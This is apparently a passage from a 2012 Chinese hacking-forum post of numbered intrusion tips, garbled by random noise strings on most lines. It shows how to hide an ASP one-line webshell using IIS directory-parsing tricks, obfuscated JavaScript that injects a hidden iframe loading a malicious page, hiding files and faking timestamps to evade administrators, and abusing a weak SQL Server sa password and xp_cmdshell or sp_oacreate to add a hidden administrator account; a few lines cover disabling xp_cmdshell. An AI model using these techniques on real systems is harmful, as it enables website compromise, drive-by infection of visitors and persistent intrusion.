拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp; ?. n* A; h: t9 F) d& }- O2 T
通过web访问ASP木马:http://ip/images../news.asp?action=login
8 v1 D# f/ s6 r+ U9 T如何删除非标准目录:rmdir images..\ /s3 i% y: e4 D7 G, v F
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:- b6 v4 D* P" V* D' d/ z
mkdir programme.asp! a6 ]! b1 ~5 D7 w7 s/ R" [
新建1.txt文件内容:<!--#include file=”12.jpg”-->+ L: x3 U6 ?- ~0 @ q
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
- r' D q0 O- v1 r; [0 }- P$ f4 Vattrib +H +S programme.asp6 E; G1 c2 J# W( {+ y
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
; s/ V3 X9 _9 S. t1 |1 K. l8 o# J2 |6 w- N1 U7 h
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
3 m; ?3 j9 ~+ {- O! H3 g. u0 o' C然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。! V$ }/ K6 Z2 @6 Q/ c* I
0 q5 c P1 ?: R8 R3 l, s% e55、JS隐蔽挂马
" \ Q- z! N1 K5 g3 B1., J. J6 L: W$ `" S6 O
var tr4c3="<iframe src=ht";
4 n9 k2 v2 n1 e# ?) z1 z" r# Ftr4c3 = tr4c3+"tp:/";' I" z' K1 Y& d& o2 \* x. b
tr4c3 = tr4c3+"/ww";
R' x: W; G' ~; Itr4c3 = tr4c3+"w.tr4";
, L8 \ h: C: b+ ]+ U4 M6 Y8 J% c% Ctr4c3 = tr4c3+"c3.com/inc/m";
8 f: X7 b4 y. V. ^tr4c3 = tr4c3+"m.htm style="display:none"></i";
% ~& F# k; C5 ctr4c3 =tr4c3+"frame>'";' `( Q6 P! o% ~$ z+ V! E) @1 b! K
document.write(tr4c3);
7 Q0 i( W& p$ X避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。7 Y t8 C' `/ y$ p7 n" ?
+ v% U1 |; Z. u
2.
+ a6 R: P1 ^# e- @& ]3 ~1 e转换进制,然后用EVAL执行。如
& l$ ?0 }; r9 [+ N3 q, `6 t6 peval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ s" S$ ^! K8 W不过这个有点显眼。) _# v7 m0 `; b0 F8 ~
3.
# X' T: q) T, z6 G: T0 o! Sdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
9 }' W7 j. v! Y q: c* C2 h: M最后一点,别忘了把文件的时间也修改下。7 r' H; w, i2 d4 d* [/ o( L
0 n* i( E* D$ i) a: m" n) ]56.3389终端入侵常用DOS命令
+ ]$ V( g9 l+ N1 D0 Ataskkill taskkill /PID 1248 /t" j+ l3 h1 p- C6 T8 J6 V
7 a' q: g9 x3 c$ a* M% V3 y* H* |tasklist 查进程
1 e* g; f- E2 H. @) g, ?. p
! [0 V, O/ E4 J. i& n @3 [cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限6 m3 ~5 }) U+ A t
iisreset /reboot% w9 _( W1 S7 j) ?2 J/ s: g7 t
tsshutdn /reboot /delay:1 重起服务器
: U8 ~0 {2 O6 O
! V5 K7 ~/ ]6 v0 N/ m) Ylogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
8 M i, W. i, s9 ]1 L: h2 H! h
* W4 D) \5 s- @) pquery user 查看当前终端用户在线情况# I+ b; [/ ] Q# R' p
# b0 ?( C# e( h8 A- e$ K
要显示有关所有会话使用的进程的信息,请键入:query process *
- r6 K/ k4 t2 D( O) F( e: D/ v7 l& |* n4 @" P2 N
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:28 `" b0 `9 t7 d, t/ \- C( Z- R
8 @7 `. [/ k _) y( {4 P% ^
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
/ a" j# B$ `( D3 W" S; _, D0 ` |5 X0 D1 j
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
6 w# O+ g. H& ]. g- T1 g1 v/ \- F3 l. r6 }/ k" A- ?
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
4 G& h- d# r: C; m! z$ j b
7 `' k$ l- K1 m5 ^- d7 H命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统( v+ g5 l! x; t: v
+ u* I5 K' o- G$ o
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。% u& ` y3 A( J, j4 o7 j) h. @% s
0 l4 d- ]5 r. s- r. X
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
7 y1 F; O% a& ]4 }! c/ E% M$ j) L8 {' y/ y4 B0 ^3 K8 j z5 g
56、在地址栏或按Ctrl+O,输入:, o, l. W( V- T! j& e
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
" w g/ ?; Z7 N A5 k/ x$ j: v2 j! z- C! I) |2 u% {# H W
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
; Y; X5 ]( C/ [1 _! _+ q( v# |) }/ \# ] m% q
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,5 L9 A8 W: x3 b n
用net localgroup administrators是可以看到管理组下,加了$的用户的。: \! Y/ n, h. I: Z( w9 [* `3 M
" S, r/ a# b L; D
58、 sa弱口令相关命令) U6 ~+ c: u( `# _- g
' L% i! T7 ~% X3 o9 C一.更改sa口令方法:4 t7 _ F o8 T2 [2 M3 S
用sql综合利用工具连接后,执行命令:
3 C8 l! G/ e6 ~8 ?' `exec sp_password NULL,'20001001','sa'
' P, \8 g: ?" U3 t; L(提示:慎用!)# F. X& t7 q7 L( r) ^, Z c; U
& N7 H0 {( P) ^9 c( q6 m" K% h二.简单修补sa弱口令.
; Q C: r+ P" Z ~6 `
- I1 x9 ~$ M$ I; ^方法1:查询分离器连接后执行:, u# F4 K$ R& s" G& P( Y4 w% G
if exists (select * from$ \: V3 N* e& Z, V$ x# P
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and" N3 P& k* o% f- J+ j* d3 y# e/ R9 Q& K$ m
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
- R2 q* @8 v' t; E0 p
1 t) _6 b5 h2 [! T" r# H) vexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
5 R" X+ @0 c1 \" a- J$ ^8 D# G" Y3 L
GO
/ D) K2 t( u0 S' h9 K# n8 H! X- O
然后按F5键命令执行完毕
' P! ~+ U1 S; R, x
" D8 {% I! k* ]9 s) k方法2:查询分离器连接后" V' ^7 |( y5 d% F) z
第一步执行:use master0 X! O4 F' q# ~6 v
第二步执行:sp_dropextendedproc 'xp_cmdshell'5 _" o/ M% e& l% B# `8 _ t
然后按F5键命令执行完毕
3 K( }& f4 Z( B8 F' X7 E4 s( [1 w
5 o @* G1 G7 W& o- ?! ]+ T, Q5 I/ H I1 B. \* H- y
三.常见情况恢复执行xp_cmdshell.! Z2 E+ q5 {6 F, b
) _7 _# m8 T4 P9 w% i. c4 b) T7 s+ P1 W- s
1 未能找到存储过程'master..xpcmdshell'. ~7 T S6 w; ~6 Q) X- b4 g
恢复方法:查询分离器连接后,
: e" H+ f0 k8 U! K第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int& x- Y1 c# e: }+ E
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ w; h; }' @& ^2 {/ A% x然后按F5键命令执行完毕& M& [5 g" `6 c$ ?. Z) x
) d; i) u2 a; ^2 }+ [8 q: \
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
% R2 ^3 Z$ w$ r恢复方法:查询分离器连接后,
% s( e: ^! o2 {4 c7 Q$ b第一步执行:sp_dropextendedproc "xp_cmdshell"
, S, A! s! r6 C第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'5 y j3 @; H3 L
然后按F5键命令执行完毕
9 w1 u/ k$ Z# k
, i+ X [- Y2 v) A+ Q1 ?3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
( o0 z( h/ Q' q: B恢复方法:查询分离器连接后, b6 R- v6 }4 N
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
% b0 G" g e) i$ p第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
# `2 W! x' X8 ^) B7 @/ N7 v然后按F5键命令执行完毕
; l. r6 W- Q3 l, u
" a8 A0 N0 ~8 p" k四.终极方法.1 k1 Y0 V2 f& a
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:8 r/ Q2 g# {% h
查询分离器连接后,3 T6 V2 A% c9 e, A' K7 O/ B
2000servser系统:( z% u1 k7 D2 ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
6 F7 {( ]% k& w
8 b. C9 ~, m! odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'& H1 ]/ l3 F& M6 J
, w+ K1 I$ d9 S* P8 T5 r/ Dxp或2003server系统:8 L4 T0 U$ Q. F ?3 K4 c, W
+ E& ?& }9 i% K9 u! Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
* ]& p( ^3 z: H9 R8 C" g% S2 ^+ v2 l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add' s6 \( K4 ~! O( |4 |0 A
|
发表于 2012-9-15 14:13:15
收藏
支持
反对